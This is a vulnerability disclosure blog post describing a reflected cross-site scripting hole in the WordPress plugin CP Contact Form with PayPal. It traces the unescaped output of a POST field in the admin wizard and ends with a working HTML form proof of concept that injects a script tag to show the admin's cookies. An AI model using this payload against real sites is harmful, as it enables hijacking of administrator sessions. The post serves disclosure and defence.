24 Jun

Reflected Cross-Site Scripting (XSS) Vulnerability in CP Contact Form with PayPal

Back in March of 2016 we warned of the WordPress plugin developer CodePeople, which currently has 27 plugins in the Plugin Directory, due to repeated security issues in their plugins. Over three years later things don’t look to have changed. The changelog for the latest version of the plugin CP Contact Form with PayPal is “Fixed XSS vulnerability in CSS edition” in looking into that to see if there was a vulnerability we should be notifying customers of our service that were using that plugin about, we found that there is still a related vulnerability in the current version of the plugin, which should have been caught if they checked over the code in the plugin for similar issues. The vulnerability that was fixed is identical to one that they were notified was in another of their plugin’s in October.

The plugin register its main admin page to be accessible to users with the “manage_options” capability, which normally only Administrators have:

134
add_options_page('CP Contact Form with PayPal Options', 'CP Contact Form with PayPal', 'manage_options', 'cp_contact_form_paypal.php', 'cp_contactformpp_html_post_page' );

That will cause the function cp_contactformpp_html_post_page() to run, which in turn will load the file /cp_publish_wizard.inc.php if the GET input “pwizard” is set to “1”:

470
471
472
function cp_contactformpp_html_post_page() {       
    if (@$_GET["pwizard"] == '1')
        include_once dirname( __FILE__ ) . '/cp_publish_wizard.inc.php';

In that file if the POST input “cp_contactformpp_do_action_loaded” is set to “wizard” additional code will run:

45
if (@$_POST['cp_contactformpp_do_action_loaded'] == 'wizard') {

One line of that will output the POST input “cp_contactformpp_id” without escaping it, which is a reflected cross-site scripting (XSS) vulnerability:

58
<button class="button button-primary cpmvcontainer" type="button" id="nextBtn" onclick="window.open('?page=cp_contact_form_paypal.php&cal=<?php echo $_POST["cp_contactformpp_id"]; ?>');"><?php _e('Edit the payment form settings','cp-contact-form-with-paypal'); ?></button>

There are a couple of other lines of code that are similar to that in the current version of the plugin, though they look to be have been secured elsewhere.

Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then leaving a message about that for the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that, but considering that they believe that having plugins, which have millions installs, remain in the Plugin Directory despite them knowing they are vulnerable is “appropriate action”, something is very amiss with them (which is even more reason the moderation needs to be cleaned up).

Update: To clear up the confusion where developers claim we hadn’t tried to notify them through the Support Forum (while at the same time moderators are complaining about us doing just that), here is the message we left for this vulnerability:

Is It Fixed?

If you are reading this post down the road the best way to find out if this vulnerability or other WordPress plugin vulnerabilities in plugins you use have been fixed is to sign up for our service, since what we uniquely do when it comes to that type of data is to test to see if vulnerabilities have really been fixed. Relying on the developer’s information, can lead you astray, as we often find that they believe they have fixed vulnerabilities, but have failed to do that.

Proof of Concept

The following proof of concept will cause any available cookies to be shown in an alert box, when logged in as an Administrator. Major web browsers other than Firefox provide XSS filtering, so this proof of concept will not work in those web browsers.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=cp_contact_form_paypal.php&pwizard=1" method="POST">
<input type="hidden" name="cp_contactformpp_do_action_loaded" value="wizard" />
<input type="hidden" name="cp_contactformpp_id" value='"><script>alert(document.cookie);</script>' />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service you can suggest/vote for the plugins you use to receive a security review from us. You can start using the service for free when you sign up now.

Leave a Reply

Your email address will not be published. Required fields are marked *